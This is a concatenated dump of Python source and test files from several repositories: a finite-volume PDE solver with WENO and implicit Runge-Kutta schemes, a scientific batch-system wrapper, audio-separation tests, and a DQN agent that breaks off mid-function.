def output_filename(self):
return "img/shock_tube-eno"
@property
def order(self):
return 3
class WENOShockTube(ShockTubeBase):
@property
def output_filename(self):
return "img/shock_tube-weno"
@property
def reconstruction(self):
return OptimalWENO()
@property
def order(self):
return 5
if __name__ == '__main__':
# all_solvers = [WENOShockTube()]
all_solvers = [ShockTubeO1(), ENOShockTube(), WENOShockTube()]
for shock_tube in all_solvers:
shock_tube()
```
#### File: src/morinth/advection.py
```python
import numpy as np
class Advection(object):
"""Simple advection equation."""
def __init__(self, velocity):
self.velocity = velocity
def flux(self, u, axis):
return self.velocity[axis]*u
def source(self, u, x):
return 0.0
def max_eigenvalue(self, u):
return np.max(np.abs(self.velocity))
```
#### File: src/morinth/algebraic_solvers.py
```python
import numpy as np
def fixpoint_iteration(f, x0, atol=1e-12, rtol=1e-12, maxiter=100, full_output=False):
info = {'n_eval': 1}
def is_converged(x0, fx0):
delta = np.abs(fx0 - x0)
return np.all(np.logical_or(delta < atol, delta/np.abs(x0) < rtol))
x = x0
fx = f(x)
iter = 1
while not is_converged(x, fx) and iter < maxiter:
x, fx = fx, f(fx)
info['n_eval'] += 1
iter += 1
if full_output:
return fx, info
else:
return fx
```
#### File: src/morinth/newton.py
```python
import numpy as np
import scipy.sparse.linalg as sparse_linalg
class Newton(object):
def __init__(self, boundary_mask):
self.mask = boundary_mask.reshape(-1)
def __call__(self, F, dF, x0):
x, Fx = x0.reshape((-1)), F(x0.reshape((-1)))
n_iter = 0
while not self.is_converged(x, Fx):
dF.evaluated_at(x)
delta = np.zeros_like(x)
delta, ret_code = sparse_linalg.gmres(dF.as_operator(), -Fx, delta, tol=1e-3)
assert ret_code == 0, "ret_code = " + str(ret_code)
x = x + delta
Fx = F(x)
n_iter += 1
return x.reshape(x0.shape)
def is_converged(self, x, Fx):
return np.all(np.abs(Fx[self.mask]) < 1e-3)
```
#### File: src/morinth/rusanov.py
```python
import numpy as np
class Rusanov(object):
"""Rusanov's numerical flux for hyperbolic PDEs."""
def __init__(self, model):
"""Create Rusanov's flux for `model` equations."""
self.model = model
def __call__(self, u_left, u_right, axis):
c = np.maximum(self.model.max_eigenvalue(u_left),
self.model.max_eigenvalue(u_right))
return 0.5*(self.model.flux(u_left, axis) + self.model.flux(u_right, axis)
- c*(u_right - u_left))
```
#### File: src/morinth/testing_tools.py
```python
import numpy as np
import pytest
@pytest.fixture(autouse=True)
def pytest_config(request):
return request.config
def is_manual_mode(pytest_config):
return pytest_config.getoption("--manual-mode")
def pytest_collection_modifyitems(config, items):
mark_manual = pytest.mark.skipif(not is_manual_mode(config),
reason="pass `--run-manual` to run this")
```
#### File: src/morinth/time_integration.py
```python
import numpy as np
from morinth.jacobian import ApproximateJacobian
from morinth.newton import Newton
from morinth.butcher import ButcherTableau
class TimeIntegration(object):
"""Interface for time-integration."""
def __init__(self, bc, rate_of_change):
self.bc = bc
self.rate_of_change = rate_of_change
class ExplicitTimeIntegration(TimeIntegration):
"""Base class for explicit solvers."""
def pick_time_step(self, u):
return self.cfl_number * self.rate_of_change.pick_time_step(u)
class ImplicitTimeIntegration(TimeIntegration):
"""Base class for implicit time integration."""
def __init__(self, bc, rate_of_change, boundary_mask):
super().__init__(bc, rate_of_change)
self.epsilon = 1e-8
self.non_linear_solver = Newton(boundary_mask)
def __str__(self):
return type(self).__name__ + "(..)"
def __repr__(self):
return "".join([type(self).__name__,
"(bc = ", repr(self.bc), ", ",
"rate_of_change = ", repr(self.rate_of_change), ", ",
"boundary_mask = ", repr(self.boundary_mask), ")"])
class BackwardEuler(ImplicitTimeIntegration):
def __init__(self, bc, rate_of_change, boundary_mask, cfl_number):
super().__init__(bc, rate_of_change, boundary_mask)
self.cfl_number = cfl_number
def __call__(self, u0, t, dt):
F = self.NonlinearEquation(u0, t, dt, self.bc, self.rate_of_change)
dF = ApproximateJacobian(F, u0, self.epsilon)
u1 = self.non_linear_solver(F, dF, u0)
self.bc(u1, t+dt)
return u1
def pick_time_step(self, u):
return self.cfl_number * self.rate_of_change.pick_time_step(u)
class NonlinearEquation(object):
def __init__(self, u0, t, dt, bc, rate_of_change):
self.u0, self.t, self.dt = u0, t, dt
self.bc = bc
self.rate_of_change = rate_of_change
self.shape = u0.shape
def __call__(self, u):
u0, t, dt = self.u0, self.t, self.dt
u = u.reshape(self.shape)
# self.bc(u)
residual = u - (u0 + dt*self.rate_of_change(u, t+dt))
return residual.reshape((-1))
class BDF2(ImplicitTimeIntegration):
"""Backward differentiation formula with two steps.
The BDF2 is
u2 - 4/3 u1 + 1/3 u0 = 2/3 h f(t2, u2).
"""
def __init__(self, bc, rate_of_change, boundary_mask, fixed_dt):
super().__init__(bc, rate_of_change, boundary_mask)
self.backward_euler = BackwardEuler(bc, rate_of_change, boundary_mask, None)
self.u0 = None
self.fixed_dt = fixed_dt
def __call__(self, u1, t, dt):
if not self.u0:
# The update from t=0 to t=dt must be done by BDF1.
self.u0 = u1
return self.backward_euler(self.u0, t, dt)
F = self.NonlinearEquation(self.u0, u1, t, dt, self.bc, self.rate_of_change)
dF = ApproximateJacobian(F, u1, self.epsilon)
u2 = self.non_linear_solver(F, dF, u1)
self.bc(u2, t + dt)
# store `u1` for use as `u0` in next iteration.
self.u0 = u1
return u2
def pick_time_step(self, u):
return self.fixed_dt
class NonlinearEquation(object):
def __init__(self, u0, u1, t, dt, bc, rate_of_change):
self.u0, self.u1, self.t, self.dt = u0, u1, t, dt
self.bc = bc
self.rate_of_change = rate_of_change
self.shape = u0.shape
def __call__(self, u):
u0, u1, t, dt = self.u0, self.u1, self.t, self.dt
u = u.reshape(self.shape)
self.bc(u, t + dt)
residual = u - 4/3*u1 + 1/3*u0 - 2/3*dt*self.rate_of_change(u, t+dt)
return residual.reshape((-1))
class DIRK(ImplicitTimeIntegration):
"""Diagonally implicit Runge-Kutta (DIRK) schemes.
DIRKs are implicit Runge-Kutta schemes where the only implicit terms
are on the diagonal.
References:
[1]: <NAME>, 1977, SIAM J. Num. Anal.
"""
def __init__(self, bc, rate_of_change, boundary_mask, cfl_number, tableau):
"""Create a DIRK object.
Parameters:
:bc: boundary conditions
:rate_of_change: right-hand side of the ODE
:boundary_mask: like in `ForwardEuler`
:tableau: a diagonally implicit Butcher tableau
"""
super().__init__(bc, rate_of_change, boundary_mask)
self.tableau = tableau
self.dudt_buffers = None
self.cfl_number = cfl_number
def __call__(self, u0, t, dt):
self.allocate_buffers(u0)
uj = u0
for j in range(self.tableau.stages):
F, dF = self.non_linear_equation(u0, t, dt, j)
uj = self.non_linear_solver(F, dF, uj)
self.bc(uj)
u1 = u0 + dt*np.sum(self.tableau.b*self.dudt_buffers, axis=-1)
self.bc(u1)
return u1
def allocate_buffers(self, u):
"""Allocate rate of change buffers if needed."""
shape = u.shape+(self.tableau.stages,)
if self.dudt_buffers is None or self.dudt_buffers.shape != shape:
self.dudt_buffers = np.zeros(shape)
def non_linear_equation(self, u0, t, dt, stage):
"""Return the non-linear equation and the Jacobian.
Arguments:
u0: approximation of u at time `t`.
t: current simulation time
dt: size of the time-step
stage: current stage of the DIRK
Return:
(F, dF): `F` is the non-linear equation.
`dF` is the Jacobian of `F`.
"""
F = self.NonlinearEquation(u0, t, dt, self.bc, self.rate_of_change,
self.tableau, self.dudt_buffers, stage)
dF = ApproximateJacobian(F, u0, self.epsilon)
return F, dF
def pick_time_step(self, u):
return self.cfl_number * self.rate_of_change.pick_time_step(u)
class NonlinearEquation(object):
def __init__(self, u0, t, dt, bc, rate_of_change, tableau, dudt_buffers, stage):
self.u0, self.t, self.dt = u0, t, dt
self.bc = bc
self.rate_of_change = rate_of_change
self.tableau = tableau
self.dudt_buffers = dudt_buffers
self.stage = stage
self.shape = u0.shape
s, k = stage, self.dudt_buffers
sm1 = max(0, s-1)
self.sum_k = np.sum(self.tableau.a[s,:sm1]*k[...,:sm1], axis=-1)
def __call__(self, u):
u0, t, dt = self.u0, self.t, self.dt
u = u.reshape(self.shape)
a, s, k = self.tableau.a, self.stage, self.dudt_buffers
dt_star = self.tableau.c[s]*dt
t_star = t + dt_star
k[...,s] = self.rate_of_change(u, t_star)
residual = u - (u0 + dt_star*(self.sum_k + a[s,s]*k[...,s]))
return residual.reshape((-1))
class DIRKa23(DIRK):
"""Two stage, third order, A-stable DIRK."""
def __init__(self, bc, rate_of_change, boundary_mask, cfl_number):
isqrt3 = 1.0/np.sqrt(3.0)
a11 = 0.5*(1.0 + isqrt3)
a21 = -isqrt3
a22 = 0.5*(1.0 + isqrt3)
a = np.array([[a11, 0.0], [a21, a22]])
b = np.array([0.5, 0.5])
tableau = ButcherTableau(a, b)
super().__init__(bc, rate_of_change, boundary_mask, cfl_number, tableau)
class DIRKa34(DIRK):
"""Three stage, fourth order, A-stable DIRK."""
def __init__(self, bc, rate_of_change, boundary_mask, cfl_number):
alpha = 2.0*np.cos(np.pi/18.0)/np.sqrt(3.0)
a11 = 0.5*(1 + alpha)
a21 = -0.5*alpha
a22 = 0.5*(1 + alpha)
a31 = 1 + alpha
a32 = -(1 + 2*alpha)
a33 = 0.5*(1 + alpha)
a = np.array([[a11, 0.0, 0.0],
[a21, a22, 0.0],
[a31, a32, a33]])
b = np.array([1.0/(6.0*alpha**2), 1.0 - 1.0/(3*alpha**2), 1.0/(6.0*alpha**2)])
tableau = ButcherTableau(a, b)
super().__init__(bc, rate_of_change, boundary_mask, cfl_number, tableau)
```
#### File: morinth/test/advection_test.py
```python
import numpy as np
import matplotlib.pylab as plt
from morinth.advection import Advection
from morinth.rusanov import Rusanov
from morinth.grid import Grid
from morinth.boundary_conditions import Periodic
from morinth.finite_volume_fluxes import FVMRateOfChange
from morinth.runge_kutta import ForwardEuler, Fehlberg
from morinth.time_loop import TimeLoop
from morinth.time_keeper import FixedDuration, PlotNever
from morinth.quadrature import GaussLegendre
from morinth.math_tools import l1_error, convergence_rate
from morinth.euler_experiment import AdvectionExperiment
from morinth.progress_bar import SilentProgressBar
from morinth.weno import OptimalWENO
import pytest
class PDE(object):
def __init__(self):
self.grid = Grid([[0.0, 1.0], [-1.0, -0.5]], [100, 20], 1)
self.model = Advection(np.array([1.0, 2.0]))
self.flux = Rusanov(self.model)
self.fvm = FVMRateOfChange(self.grid, self.flux, None, None)
self.bc = Periodic(self.grid)
def test_advection():
pde = PDE()
visualize = lambda u : None
plotting_steps = PlotNever()
single_step = ForwardEuler(pde.bc, pde.fvm)
simulation = TimeLoop(single_step, visualize, plotting_steps)
shape = (1,) + pde.grid.cell_centers.shape[:2]
u0 = (np.cos(2*np.pi*pde.grid.cell_centers[:,:,0])
* np.sin(2*np.pi*pde.grid.cell_centers[:,:,1])).reshape(shape)
time_keeper = FixedDuration(T = 0.3)
uT = simulation(u0, time_keeper);
assert np.all(np.isfinite(uT))
def smooth_pattern(x):
return np.sin(2.0*np.pi*x - 0.1)
class SineAdvection(AdvectionExperiment):
def __init__(self, n_cells, order):
self._order = order
self._n_cells = n_cells + self.n_ghost
self.cell_average = GaussLegendre(5)
@property
def final_time(self):
return 0.1
@property
def progress_bar(self):
return SilentProgressBar()
@property
def plotting_steps(self):
return PlotNever()
@property
def order(self):
return self._order
@property
def n_cells(self):
return self._n_cells
@property
def initial_condition(self):
return lambda grid: self.cell_average(grid.edges, smooth_pattern).reshape((1, -1))
@property
def velocity(self):
return np.array([2.34])
@property
def reference_solution(self):
t, v = self.final_time, self.velocity
return self.cell_average(self.grid.edges, lambda x: smooth_pattern(x - t*v)).reshape((1, -1))
# return smooth_pattern(self.grid.cell_centers - t*v).reshape((1, -1))
@property
def visualize(self):
return None
@property
def single_step(self):
_single_step = Fehlberg(self.boundary_condition, self.fvm)
self._single_step = getattr(self, "_single_step", _single_step)
return self._single_step
def test_convergence_rate():
all_resolutions = np.array([10, 20, 40, 80, 160, 320, 640])
weno = OptimalWENO()
err = np.empty(all_resolutions.size)
for k, resolution in enumerate(np.nditer(all_resolutions)):
simulation = SineAdvection(resolution, 5)
grid = simulation.grid
uT = simulation()
u_ref = simulation.reference_solution
# plt.clf()
# plt.plot(grid.cell_centers[:,0], uT[0,...])
# plt.hold(True)
# plt.plot(grid.cell_centers[:,0], u_ref[0,...])
# plt.show()
err[k] = l1_error(uT[:,3:-3], u_ref[:,3:-3])
rate = convergence_rate(err, all_resolutions-6)
assert np.abs(np.max(np.abs(rate)) - 5.0) < 0.1
# print("")
# print(err)
# print(convergence_rate(err, np.array(all_resolutions)-6))
```
#### File: morinth/test/quadrature_test.py
```python
import numpy as np
import scipy.integrate
from morinth.quadrature import GaussLegendre
from morinth.grid import Grid
def sinusoidal(x):
x = (x - 10.0)/100.0
fx = np.sin(2.0*np.pi*x) * np.cos(2.0*np.pi*x)**2
return fx
def quadrature_error(n_cells, n_points):
grid = Grid([10.0, 100.0], n_cells, 1)
integrate = GaussLegendre(n_points)
fbar = integrate(grid.edges, sinusoidal)
fref = np.empty(n_cells)
for i in range(n_cells):
fref[i], err = scipy.integrate.quadrature(sinusoidal, grid.edges[i], grid.edges[i+1],
tol = 1e-10, rtol=1e-10)
fref *= 1.0/grid.dx
return np.max(np.abs(fbar - fref))
def quadrature_rate(n_points):
resolutions = np.array([10, 20, 50, 100, 200, 500])
errors = np.array([quadrature_error(res, n_points) for res in np.nditer(resolutions)])
rate = np.max(np.abs(np.log(errors[1:]/errors[:-1])/np.log(resolutions[1:]/resolutions[:-1])))
return rate
def test_quadrature_vs_scipy():
for n_points in range(1,6):
empirical = quadrature_rate(n_points)
order = 2.0*n_points
assert empirical > order - 0.1, "{:.1f} vs. {:.1f}".format(empirical, float(order))
```
#### File: morinth/test/source_terms_test.py
```python
import numpy as np
import matplotlib.pyplot as plt
from morinth.source_terms import BalancedSourceTerm, EquilibriumDensityInterpolation, UnbalancedSourceTerm
from morinth.grid import Grid
from morinth.euler import Euler, PointMassGravity
from morinth.equilibrium import IsothermalEquilibrium, IsentropicEquilibrium
from morinth.weno import OptimalWENO, EquilibriumStencil
from morinth.gaussian_bump import GaussianBumpIC
from morinth.quadrature import GaussLegendre
from morinth.math_tools import l1_error, linf_error, convergence_rate
from morinth.latex_tables import LatexConvergenceTable
from morinth.visualize import ConvergencePlot
import morinth.testing_tools as testing_tools
from morinth.testing_tools import pytest_config
def check_source_term_order(order, Equilibrium):
model = Euler(gamma=1.4, gravity = 1.2, specific_gas_constant=2.0)
quadrature = GaussLegendre(5)
all_resolutions = 2**np.arange(3, 11) + 6
err = np.empty((4, all_resolutions.size))
for l, res in enumerate(all_resolutions):
grid = Grid([0.0, 1.0], res, 3)
equilibrium = Equilibrium(grid, model)
ic = GaussianBumpIC(model, equilibrium)
ic.p_amplitude, ic.rho_amplitude = 0.0, 0.1
weno = OptimalWENO(EquilibriumStencil(grid, equilibrium, model))
source_term = BalancedSourceTerm(grid, model, equilibrium, order=order)
u_bar = ic(grid)
u_plus, u_minus = weno(u_bar, axis=0)
u_left, u_right = u_minus[:,:-1,...], u_plus[:,1:,...]
s_approx = source_term.edge_source(u_bar, u_left, u_right, axis=0)
S_momentum = lambda x: -ic.point_values(x)[0,...]*model.gravity.dphi_dx(x)
s_ref = np.zeros_like(s_approx)
s_ref[1,...] = quadrature(grid.edges[3:-3,...], S_momentum)
err[:, l] = linf_error(s_approx, s_ref)
rate = convergence_rate(err[1, ...], all_resolutions-6)
return err[1,...], rate, all_resolutions
def source_term_order(Equilibrium, label):
all_errors, all_rates = [], []
all_labels = ["$S_{(1)}$", "$S_{(2)}$"]
for order in [2, 4]:
errors, rates, resolutions = check_source_term_order(order, Equilibrium)
all_errors.append(errors)
all_rates.append(rates)
filename_base = "img/code-validation/source_term-{:s}".format(label)
table = LatexConvergenceTable(all_errors, all_rates, resolutions-6, all_labels)
table.write(filename_base + ".tex")
plot = ConvergencePlot(trend_orders=[2, 4])
plot(all_errors, resolutions-6, all_labels)
plot.save(filename_base)
assert np.abs(np.max(all_rates[1]) - 4.0) < 0.1
def test_source_term_order():
source_term_order(IsothermalEquilibrium, "isothermal")
source_term_order(IsentropicEquilibrium, "isentropic")
def test_unbalanced_source_term():
gravity = PointMassGravity(1.0, 1.0, 1.0)
model = Euler(gamma = 1.4, gravity = gravity, specific_gas_constant = 1.0)
def rho(x):
return 2.0 + np.sin(3*np.pi*x) * np.cos(2*np.pi*x)
def dphi_dx(x):
return model.gravity.dphi_dx(x)
quadrature = GaussLegendre(5)
all_resolutions = 2**np.arange(4, 10) + 6
err = np.empty((1, all_resolutions.size))
for l, res in enumerate(all_resolutions):
grid = Grid([0.0, 1.0], res, 3)
def ic(x):
u0 = np.zeros((4,) + x.shape)
u0[0,...] = rho(x)
u0[3,...] = 1.0
return u0
u_bar = quadrature(grid.edges, ic)
source_term = UnbalancedSourceTerm(grid, model)
s_approx = source_term.volume_source(u_bar)
s_ref = quadrature(grid.edges[2:-2,...], lambda x : -rho(x)*dphi_dx(x))
err[:, l] = l1_error(s_approx[1,2:-2,...], s_ref)
rate = convergence_rate(err, all_resolutions-6)
assert np.all(np.abs(rate - 4.0) < 0.15)
def test_equilibrium_interpolation(pytest_config):
n_ghost = 3
model = Euler(gamma = 1.4, gravity = 1.0, specific_gas_constant = 1.0)
alpha = 0.25
resolutions = 2**np.arange(3, 10) + 6
err = np.empty(resolutions.size)
filename_base = "img/code-validation/equilibrium_interpolation-{:d}"
for l, n_cells in enumerate(resolutions):
grid = Grid([0.0, 1.0], n_cells, n_ghost)
equilibrium = IsothermalEquilibrium(grid, model)
ic = GaussianBumpIC(model, equilibrium)
ic.rho_amplitude, ic.p_amplitude = 1.0, 0.0
stencil = EquilibriumStencil(grid, equilibrium, model)
x0 = grid.edges[n_ghost:-n_ghost-1,0]
x1 = grid.edges[n_ghost+1:-n_ghost,0]
x_ref = grid.cell_centers[n_ghost:-n_ghost,0]
u0 = ic(grid)
interpolate = EquilibriumDensityInterpolation(grid, model, equilibrium, u0)
x = x0 + alpha*(x1 - x0)
w_exact = ic.point_values(x)
rho_exact = w_exact[0,...]
rho_ref, p_ref = equilibrium.point_values(u0[:,3:-3], x_ref)
rho_eq_approx, _ = equilibrium.extrapolate(rho_ref, p_ref, x_ref, x)
drho_approx = interpolate(alpha)
rho_approx = rho_eq_approx + drho_approx
plt.clf()
plt.plot(x_ref, u0[0,3:-3], label="ref")
plt.plot(x, rho_eq_approx, label="loc. eq")
plt.plot(x, rho_approx, label="approx")
plt.plot(x, drho_approx, label="delta")
plt.legend()
filename = filename_base.format(l)
plt.savefig(filename + ".eps")
plt.savefig(filename + ".png")
if testing_tools.is_manual_mode(pytest_config):
plt.show()
err[l] = l1_error(rho_approx[np.newaxis,:], rho_exact[np.newaxis,:])
rate = convergence_rate(err, resolutions-6)
assert np.all(np.abs(rate[3:] - 5.0) < 0.2)
``` |
{
"source": "1uc/SciBS",
"score": 2
} |
#### File: src/scibs/scibs.py
```python
class SciBS:
"""A Scientific Batch System.
Note: Batch systems should be used inside a `with` block to allow the batch
system to acquire and release resources properly.
"""
def __enter__(self):
return self
def __exit__(self, *args):
pass
def submit(self, job):
raise NotImplementedError(
f"{self.__class__.__name__} hasn't implemented `submit`."
)
```
#### File: src/scibs/sequential_local_bs.py
```python
import scibs
class SequentialLocalBS(scibs.SciBS):
"""A batch system for when no batch system is present.
Instead of submitting jobs to a batch system, those jobs will simply
be run on the same computer.
NOTE: This is blocking, i.e. `submit` only returns after the
job has been completed.
NOTE: By default, this will, in the simplest case, run
subprocess.run(" ".join(job.cmd), shell=True, check=False)
The important thing to observe is the `shell=True` part.
"""
def __init__(self, submission_policy=None, wrap_policy=None):
if submission_policy is None:
submission_policy = scibs.SubprocessSubmissionPolicy(
subprocess_kwargs={"check": False, "shell": True}
)
if wrap_policy is None:
wrap_policy = scibs.DefaultWrapPolicy()
self._submission_policy = submission_policy
self._wrap_policy = wrap_policy
def submit(self, job):
cmd = self.cmdline(job)
self._submission_policy(cmd, cwd=job.cwd, env=job.env)
def cmdline(self, job):
return self.wrap(job)
def wrap(self, job):
return self._wrap_policy(job)
```
#### File: SciBS/test/test_local_bs.py
```python
import scibs
import pytest
def test_local_bs_with_gpus():
r = scibs.JustGPUsResource(n_gpus=1)
j = scibs.Job(
cmd=["echo ${CUDA_VISIBLE_DEVICES} >> __dbg_cuda_devices.txt"], resources=r
)
local_bs_kwargs = {
"resource_policy": scibs.GPUResourcePolicy(),
"local_resources": scibs.LocalGPUResources("1,2,3,4,5,6"),
}
with scibs.LocalBS(**local_bs_kwargs) as queue:
for k in range(10):
queue.submit(j)
```
#### File: SciBS/test/test_resources.py
```python
import datetime
import scibs
import pytest
def test_mpi_resource():
n_tasks = 10
mem_per_task = 50 * 10**6
wall_clock = datetime.timedelta(hours=3)
r = scibs.MPIResource(
n_mpi_tasks=n_tasks, wall_clock=wall_clock, mem_per_task=mem_per_task
)
assert r.n_cores == n_tasks
assert r.n_mpi_tasks == n_tasks
assert r.wall_clock == wall_clock
assert r.memory_per_core == mem_per_task
assert r.needs_mpi
assert not r.needs_omp
assert not hasattr(r, "n_omp_threads")
def test_omp_resource():
n_threads = 8
total_memory = 50 * 10**6
wall_clock = datetime.timedelta(hours=3)
r = scibs.OMPResource(
n_omp_threads=n_threads, wall_clock=wall_clock, total_memory=total_memory
)
assert r.n_cores == n_threads
assert r.n_omp_threads == n_threads
assert r.wall_clock == wall_clock
assert r.memory_per_core == total_memory / n_threads
assert not r.needs_mpi
assert r.needs_omp
assert not hasattr(r, "n_mpi_tasks")
def test_mpi_omp_resource():
n_threads = 4
n_tasks = 1
n_cus = 3
mem_per_cu = 50 * 10**6
cu = scibs.CU(n_omp_threads=n_threads, n_mpi_tasks=n_tasks)
r = scibs.CUResource(cu, n_cus, mem_per_cu=mem_per_cu)
assert r.n_cores == n_threads * n_cus
assert r.memory_per_core == mem_per_cu / n_threads
assert r.needs_mpi
assert r.needs_omp
class IncompleteResource(scibs.Resource):
pass
def test_resource_interface():
incomplete_resource = IncompleteResource()
with pytest.raises(NotImplementedError):
incomplete_resource.n_cores
with pytest.raises(NotImplementedError):
incomplete_resource.memory_per_core
def test_cu_omp():
cu = scibs.CU(n_omp_threads=2)
assert cu.n_cores_per_cu == 2
cu = scibs.CU(n_mpi_tasks=3)
assert cu.n_cores_per_cu == 3
def test_just_cores_resource():
just_cores = scibs.JustCoresResource()
assert just_cores.n_cores == 1
just_cores = scibs.JustCoresResource()
assert just_cores.memory_per_core is None
just_cores = scibs.JustCoresResource(n_cores=2, total_memory=4)
assert just_cores.memory_per_core == 2.0
def test_just_gpus_resources():
r = scibs.JustGPUsResource(3)
assert r.n_cores == 1
assert r.n_gpus_per_process == 3
assert r.memory_per_core is None
r = scibs.JustGPUsResource(n_gpus=4, total_memory=4)
assert r.n_cores == 1
assert r.n_gpus_per_process == 4
assert r.memory_per_core == 4.0
``` |
{
"source": "1uka/open-unmix-pytorch",
"score": 2
} |
#### File: open-unmix-pytorch/tests/test_datasets.py
```python
import pytest
import numpy as np
import data
def test_musdb():
musdb = data.MUSDBDataset(
download=True,
samples_per_track=1,
seq_duration=1.0
)
for x, y in musdb:
print(x.mean())
```
#### File: open-unmix-pytorch/tests/test_inference.py
```python
import pytest
import numpy as np
import torch
import model
import test
@pytest.fixture(params=[4096, 4096*10])
def nb_timesteps(request):
return int(request.param)
@pytest.fixture(params=[1, 2, 3])
def nb_channels(request):
return request.param
@pytest.fixture(params=[1, 2, 16])
def nb_samples(request):
return request.param
@pytest.fixture(params=[1024, 2048, 4096])
def nfft(request):
return int(request.param)
@pytest.fixture(params=[2, 4, 8])
def hop(request, nfft):
return(nfft // request.param)
@pytest.fixture
def audio(request, nb_samples, nb_channels, nb_timesteps):
return torch.rand((nb_samples, nb_channels, nb_timesteps))
def test_stft(audio, nb_channels, nfft, hop):
unmix = model.OpenUnmix(nb_channels=nb_channels)
unmix.stft.center = True
X = unmix.stft(audio)
X = X.detach().numpy()
X_complex_np = X[..., 0] + X[..., 1]*1j
out = test.istft(X_complex_np)
assert np.sqrt(np.mean((audio.detach().numpy() - out)**2)) < 1e-6
```
#### File: open-unmix-pytorch/tests/test_regression.py
```python
import os
import pytest
import musdb
import simplejson as json
import museval
import numpy as np
import eval
test_track = 'Al James - Schoolboy Facination'
json_path = os.path.join(
os.path.dirname(os.path.realpath(__file__)),
'data/%s.json' % test_track,
)
@pytest.fixture()
def mus():
return musdb.DB(download=True)
def test_estimate_and_evaluate(mus):
# return any number of targets
with open(json_path) as json_file:
ref = json.loads(json_file.read())
track = [track for track in mus.tracks if track.name == test_track][0]
scores = eval.separate_and_evaluate(
track,
targets=['vocals', 'drums', 'bass', 'other'],
model_name='umx',
niter=1,
alpha=1,
softmask=False,
output_dir=None,
eval_dir=None,
device='cpu'
)
assert scores.validate() is None
with open(
os.path.join('.', track.name) + '.json', 'w+'
) as f:
f.write(scores.json)
scores = json.loads(scores.json)
for target in ref['targets']:
for metric in ['SDR', 'SIR', 'SAR', 'ISR']:
ref = np.array([d['metrics'][metric] for d in target['frames']])
idx = [t['name'] for t in scores['targets']].index(target['name'])
est = np.array(
[
d['metrics'][metric]
for d in scores['targets'][idx]['frames']
]
)
assert np.allclose(ref, est, atol=1e-02)
``` |
{
"source": "1UnboundedSentience/Django",
"score": 2
} |
#### File: Django/myintro/views.py
```python
from django.http import HttpResponse
from django import template
from django.shortcuts import render
def donkey(request):
return HttpResponse("Hello World! This will soon be a webpage")
def penguin(request):
return render(request, 'example-template.html',
{
'person_name' : "Jason",
'item_list': ['snake', 'dog', 'cat'],
'ordered_warranty': False,
'company': "Google Inc.",
'ship_date': "April 10, 2016"
})
``` |
{
"source": "1UnboundedSentience/MovieTrailerApp",
"score": 4
} |
#### File: 1UnboundedSentience/MovieTrailerApp/media.py
```python
class Movie():
def __init__(self, title, poster_image_url, trailer_youtube_url):
self.title = title
self.poster_image_url = poster_image_url
self.trailer_youtube_url = trailer_youtube_url
'''Create a data structure (i.e. a Python Class) to store your favorite movies, including movie title, box art URL (or poster URL) and a YouTube link to the movie trailer.
Create multiple instances of that Python Class to represent your favorite movies; group all the instances together in a list.
To help you generate a website that displays these movies, we have provided a starter code repository that contains a Python module called fresh_tomatoes.py. To get started, fork this repository to create your own copy in GitHub. Then clone your ud036_StarterCode repository to work on this project locally on your computer. The fresh_tomatoes.py module has a function called open_movies_page that takes in one argument, which is a list of movies, and creates an HTML file which will display all of your favorite movies.
Ensure your website renders correctly when you attempt to load it in a browser.'''
``` |
{
"source": "1upCommunity/Box",
"score": 2
} |
#### File: 1upCommunity/Box/person.py
```python
import time
import gym, numpy as np
import pygame, pymunk, logging, math, random
# imports for DQNAgent
import numpy as np
from keras.models import Sequential
from keras.layers import Dense, Dropout, Conv2D, MaxPooling2D, Activation, Flatten
from tensorflow.keras.optimizers import Adam
from keras.callbacks import TensorBoard
import tensorflow as tf
from collections import deque
import time
import random
import os
# Hide GPU from visible devices
tf.config.set_visible_devices([], 'GPU')
DISCOUNT = 0.99
REPLAY_MEMORY_SIZE = 50_000 # How many last steps to keep for model training
MIN_REPLAY_MEMORY_SIZE = 1_000 # Minimum number of steps in a memory to start training
MINIBATCH_SIZE = 64 # How many steps (samples) to use for training
UPDATE_TARGET_EVERY = 5 # Terminal states (end of episodes)
MODEL_NAME = 'BOX'
# Exploration settings
ELIPSON_DECAY = 0.099975
MIN_EPSILON = 0.001
# For stats
ep_rewards = [-200]
# For more repetitive results
random.seed(1)
np.random.seed(1)
# Memory fraction, used mostly when training multiple agents
#gpu_options = tf.GPUOptions(per_process_gpu_memory_fraction=MEMORY_FRACTION)
#backend.set_session(tf.Session(config=tf.ConfigProto(gpu_options=gpu_options)))
# Create models folder
if not os.path.isdir('models'):
os.makedirs('models')
# Own Tensorboard class
class ModifiedTensorBoard(TensorBoard):
# Overriding init to set initial step and writer (we want one log file for all .fit() calls)
def __init__(self, **kwargs):
super().__init__(**kwargs)
self.step = 1
self.writer = tf.summary.create_file_writer(self.log_dir)
# Overriding this method to stop creating default log writer
def set_model(self, model):
pass
# Overrided, saves logs with our step number
# (otherwise every .fit() will start writing from 0th step)
def on_epoch_end(self, epoch, logs=None):
self.update_stats(**logs)
# Overrided
# We train for one batch only, no need to save anything at epoch end
def on_batch_end(self, batch, logs=None):
pass
# Overrided, so won't close writer
def on_train_end(self, _):
pass
# Custom method for saving own metrics
# Creates writer, writes custom metrics and closes writer
def update_stats(self, **stats):
self._write_logs(stats, self.step)
# Agent class
class DQNAgent:
def __init__(self, env):
self.env = env
# Main model
self.model = self.create_model()
# Target network
self.target_model = self.create_model()
self.target_model.set_weights(self.model.get_weights())
# An array with last n steps for training
self.replay_memory = deque(maxlen=REPLAY_MEMORY_SIZE)
# Custom tensorboard object
self.tensorboard = ModifiedTensorBoard(log_dir="logs/{}-{}".format(MODEL_NAME, int(time.time())))
# Used to count when to update target network with main network's weights
self.target_update_counter = 0
def create_model(self,):
model = Sequential()
observation_space = 60000, np.array(self.env.observation).shape[0], np.array(self.env.observation).shape[1], 1
action_space = self.env.action_space.n
model.add(Conv2D(32, (3, 3), activation='relu', input_shape=observation_space[1:]))
model.add(Activation('relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Dropout(0.2))
model.add(Conv2D(256, (3, 3)))
model.add(Activation('relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Dropout(0.2))
model.add(Flatten()) # this converts our 3D feature maps to 1D feature vectors
model.add(Dense(64))
model.add(Dense(action_space, activation='linear')) # ACTION_SPACE_SIZE = how many choices (9)
model.compile(loss="mse", optimizer=Adam(lr=0.001), metrics=['accuracy'])
return model
# Adds step's data to a memory replay array
# (observation space, action, reward, new observation space, done)
def update_replay_memory(self, transition):
self.replay_memory.append(transition)
# Trains main network every step during episode
def train(self, terminal_state, step):
# Start training only if certain number of samples is already saved
